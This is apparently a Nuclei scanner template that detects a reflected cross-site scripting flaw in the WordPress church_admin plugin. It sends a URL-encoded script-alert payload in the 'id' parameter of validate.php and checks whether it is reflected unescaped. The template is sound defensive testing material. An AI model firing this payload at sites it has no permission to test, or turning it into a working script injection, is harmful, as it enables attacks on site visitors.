id: wp-church-admin-xss

info:
  name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  reference: https://www.securityfocus.com/bid/54329/info
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert('{{randstr}}')</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
